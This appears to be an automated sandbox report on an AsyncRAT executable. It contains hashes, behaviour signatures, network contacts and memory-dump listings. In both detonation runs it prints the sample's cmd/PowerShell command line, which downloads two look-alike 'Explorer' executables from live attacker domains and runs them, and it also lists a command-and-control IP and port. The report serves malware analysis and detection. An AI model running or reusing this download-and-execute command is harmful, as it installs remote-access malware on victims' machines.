Analysis Overview
SHA256
a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392
Threat Level: Known bad
The file 2e5d5abda2f010c8c2cceeb6ff027cc3.exe was found to be: Known bad.
Malicious Activity Summary
Async RAT payload
AsyncRat
Asyncrat family
Checks computer location settings
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-17 11:36
Signatures
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Asyncrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-17 11:36
Reported
2024-04-17 11:38
Platform
win7-20240215-en
Max time kernel
146s
Max time network
150s
Command Line
Signatures
AsyncRat
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe
"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
Network
| Country | Destination | Domain | Proto |
| FR | 51.254.53.24:4449 | tcp | |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp |
Files
memory/2952-0-0x0000000000070000-0x0000000000088000-memory.dmp
memory/2952-1-0x000007FEF5CB0000-0x000007FEF669C000-memory.dmp
memory/2952-3-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2760-9-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
memory/2760-8-0x000000001B6A0000-0x000000001B982000-memory.dmp
memory/2760-10-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/2760-11-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
memory/2760-12-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2760-13-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2760-14-0x0000000002A10000-0x0000000002A90000-memory.dmp
memory/2952-15-0x00000000778A0000-0x0000000077A49000-memory.dmp
memory/2760-16-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 8d54200180804576414e8d710472b1f0 |
| SHA1 | 54b14e2effe390f925c72eff8428411865c5323f |
| SHA256 | 8a97c800af4a71ad7e0699c8c7a8b096631d3bd7745d98110fb9f294255e4344 |
| SHA512 | bea043a056c53c2f51684f86ed9e1b1e8661631403e805358752e582d9acbdc94ccb8b6e5d91a2df2cb0969e89b7d5dcd0a73b04a02202daab78a38f300ea6e6 |
memory/2444-22-0x000000001B5E0000-0x000000001B8C2000-memory.dmp
memory/2444-24-0x0000000002B40000-0x0000000002BC0000-memory.dmp
memory/2444-23-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2444-26-0x0000000001F70000-0x0000000001F78000-memory.dmp
memory/2444-25-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2444-29-0x0000000002B40000-0x0000000002BC0000-memory.dmp
memory/2444-28-0x0000000002B40000-0x0000000002BC0000-memory.dmp
memory/2444-27-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2444-30-0x0000000002B40000-0x0000000002BC0000-memory.dmp
memory/2444-31-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2612-38-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
memory/2612-39-0x0000000002A20000-0x0000000002AA0000-memory.dmp
memory/2612-40-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
memory/2612-42-0x0000000002A20000-0x0000000002AA0000-memory.dmp
memory/2612-41-0x0000000002A20000-0x0000000002AA0000-memory.dmp
memory/2952-43-0x000007FEF5CB0000-0x000007FEF669C000-memory.dmp
memory/2612-44-0x0000000002A20000-0x0000000002AA0000-memory.dmp
memory/2952-45-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2612-46-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp
memory/304-52-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/304-53-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/304-55-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/304-54-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/304-56-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/304-57-0x0000000002BF0000-0x0000000002C70000-memory.dmp
memory/304-58-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp
memory/2952-59-0x00000000778A0000-0x0000000077A49000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-17 11:36
Reported
2024-04-17 11:38
Platform
win10v2004-20240412-en
Max time kernel
146s
Max time network
148s
Command Line
Signatures
AsyncRat
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe
"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| FR | 51.254.53.24:4449 | tcp | |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| FR | 51.254.53.24:4449 | tcp | |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| FR | 51.254.53.24:4449 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| FR | 51.254.53.24:4449 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp | |
| FR | 51.254.53.24:4449 | tcp |
Files
memory/4228-0-0x0000000000D70000-0x0000000000D88000-memory.dmp
memory/4228-1-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/4228-3-0x0000000002E30000-0x0000000002E40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bunyhk2y.lbc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3972-15-0x000002343CF00000-0x000002343CF10000-memory.dmp
memory/3972-14-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/3972-13-0x00000234557B0000-0x00000234557D2000-memory.dmp
memory/3972-16-0x000002343CF00000-0x000002343CF10000-memory.dmp
memory/3972-17-0x000002343CF00000-0x000002343CF10000-memory.dmp
memory/3972-20-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | e52ff3673869a8c21697e9cc80b586a9 |
| SHA1 | d86961b3dcd781a87ad6360bd69c0e4ad6ad3456 |
| SHA256 | 4263e18a993ae6da36463829ecf6f02b13035555a6f83c6f9aa048cf1151f7cc |
| SHA512 | 70e7ffc8794613d45666be095dcdb22cea7b7ea27a910cdaee1f1d3a7e313b3b0cbf5bb0889cfa4cc9b7b93963302d259d73f7ed315b15f5d8d11c0e6b1d7ead |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eab4488871ac8f99a41386e5ffbb78ff |
| SHA1 | 552887e75c58595744ff3cbc0fcf0b0ef855b0aa |
| SHA256 | dbff195e70764404bf89dd342f6eb991e377292f7de93f4791d397d2621dd279 |
| SHA512 | 5670d6c233702f066776a44e7d194b9f388e02002b975fdfbc38ee0a41d778307e80a62678e26bee68a3b1aa11ca67c297408c5880abaa7cf3a70e00d7b09bfc |
memory/2568-32-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/2568-33-0x000001DB69450000-0x000001DB69460000-memory.dmp
memory/2568-34-0x000001DB69450000-0x000001DB69460000-memory.dmp
memory/2568-35-0x000001DB69450000-0x000001DB69460000-memory.dmp
memory/2568-37-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/3464-38-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/3464-39-0x00000274E6050000-0x00000274E6060000-memory.dmp
memory/3464-40-0x00000274E6050000-0x00000274E6060000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ab6a608d425ee999e520555e510f2856 |
| SHA1 | e8da9bcbd7dbf6cbe542cd27a683f27811851822 |
| SHA256 | 44fb5a8164271cda3525070f3fa5f1b86db92ec1c3011f3233b7fce5126826b2 |
| SHA512 | 3b5c9486b6da018a20c3d42876e821bff0560a5a51e0ede165ac5a2ef7e1f5152bd56e0e7849f4a92f2a3873bcec62afc84cb680a8d1adf42016dce00bacfb87 |
memory/3464-51-0x00000274E6050000-0x00000274E6060000-memory.dmp
memory/3464-53-0x00000274FE550000-0x00000274FE76C000-memory.dmp
memory/3464-54-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/4228-55-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ff65cdc439b64c97f807c217688786aa |
| SHA1 | d57bd6d0a7390ede6056c768c7b0ad8249de554c |
| SHA256 | d24255ef8f08aa0d0a35ba6371737ca124c5b421f3797e5cbd7838d3a746fb51 |
| SHA512 | 75fce51496590db3fd58aad8dc1397760a2ac2c821649489ac12cf0ec754012186c6ecc177efa8c08ddeec3d3f47a7ef24f5e1f1b6380ddc59434293b4e5dd25 |
memory/4920-66-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp
memory/4228-69-0x0000000002E30000-0x0000000002E40000-memory.dmp
memory/4920-67-0x0000024071180000-0x0000024071190000-memory.dmp
memory/4920-68-0x0000024071180000-0x0000024071190000-memory.dmp
memory/4920-71-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp